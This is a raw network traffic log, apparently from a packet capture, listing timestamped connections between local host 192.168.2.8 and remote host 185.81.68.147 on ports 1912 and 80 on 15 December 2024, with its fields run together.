                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393959999 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394002914 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394052982 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394102097 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394113064 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394197941 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394233942 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394287109 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394298077 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394371986 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394382000 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394448042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394468069 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394542933 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394552946 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394593954 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394639015 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394697905 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394707918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394778967 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394797087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394862890 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394872904 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394948006 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.394957066 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395019054 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395030022 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395138025 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395143986 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395149946 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395222902 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395231962 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395242929 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395334959 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395344973 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395447969 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395458937 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395495892 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395505905 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395572901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395582914 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395673037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395682096 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395714045 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395725965 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395791054 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395826101 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395847082 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395941019 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.395951033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396050930 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396059990 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396187067 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396197081 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396394968 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396405935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396508932 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396518946 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396569014 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396704912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396722078 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396732092 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396753073 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396815062 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396857977 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396869898 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396950960 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.396961927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397037983 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397047997 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397094011 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397104025 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397177935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397187948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397257090 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397267103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397332907 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397344112 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397615910 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.397682905 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515274048 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515294075 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515305042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515325069 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515348911 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515358925 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515393972 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515403986 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515417099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515475035 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515522957 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515533924 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515592098 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515603065 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515635967 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515646935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515710115 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515721083 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515822887 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515832901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515863895 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515873909 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515899897 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.515928984 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516031027 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516057014 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516161919 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516186953 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516249895 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516259909 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516283035 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516294003 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516403913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516449928 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516463041 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516474009 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516499996 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516557932 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516568899 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516596079 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516658068 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516668081 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516695023 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516747952 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516758919 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516820908 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516830921 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516897917 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516907930 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.516962051 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517014980 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517024994 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517112970 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517124891 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517415047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517426014 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517438889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517477036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517481089 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517496109 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517566919 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517577887 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517648935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517658949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517824888 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517834902 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517937899 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.517972946 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518121958 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518131971 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518142939 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518157005 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518208027 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518217087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518290043 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518300056 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518315077 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518337965 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518392086 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518414021 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518485069 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518493891 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518563032 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518621922 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518631935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518651962 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518683910 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518779993 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518907070 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.518964052 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.519084930 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.519174099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.519227982 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.519445896 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.519478083 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.519650936 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.519766092 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.519777060 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.637557030 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.637576103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.637645006 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.637923956 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.637942076 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.638065100 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.638076067 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.638175011 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.638192892 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.638266087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.638299942 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.638385057 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.161962986 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.164720058 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.284585953 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.597533941 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.635310888 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.635376930 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.635600090 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.649641991 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.661950111 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.663474083 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.781990051 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.783307076 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.798743963 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.918762922 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.918936968 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:55.918987036 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.038794041 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.038889885 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.096555948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.097887039 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.158911943 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.217796087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.531069040 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.569250107 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:56.689343929 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.005197048 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.005223989 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.005280972 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.009126902 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.009160042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.009207010 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.017669916 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.071513891 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.078303099 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.198154926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.527995110 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.545193911 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.545320988 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.545773029 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.546551943 CET4971880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.571486950 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.601814985 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.650058031 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.666270971 CET8049718185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.721846104 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.769937038 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.770082951 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.770332098 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.890033007 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:57.890275955 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:58.010209084 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:58.035568953 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:58.078783035 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:58.198703051 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:58.511919975 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:58.555946112 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:58.569508076 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:58.689486980 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.003611088 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.059746981 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.162461042 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.386028051 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.386229992 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.386636019 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.387468100 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.493855000 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.507210970 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.613681078 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.613826036 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.613914013 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.733655930 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.733813047 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:59.853669882 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.233606100 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.233767033 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.234739065 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.234787941 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.337753057 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.354562998 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.457638979 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.457743883 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.457843065 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.577734947 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.577836037 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:01.697828054 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:02.918786049 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:02.918812990 CET8049721185.81.68.147192.168.2.8
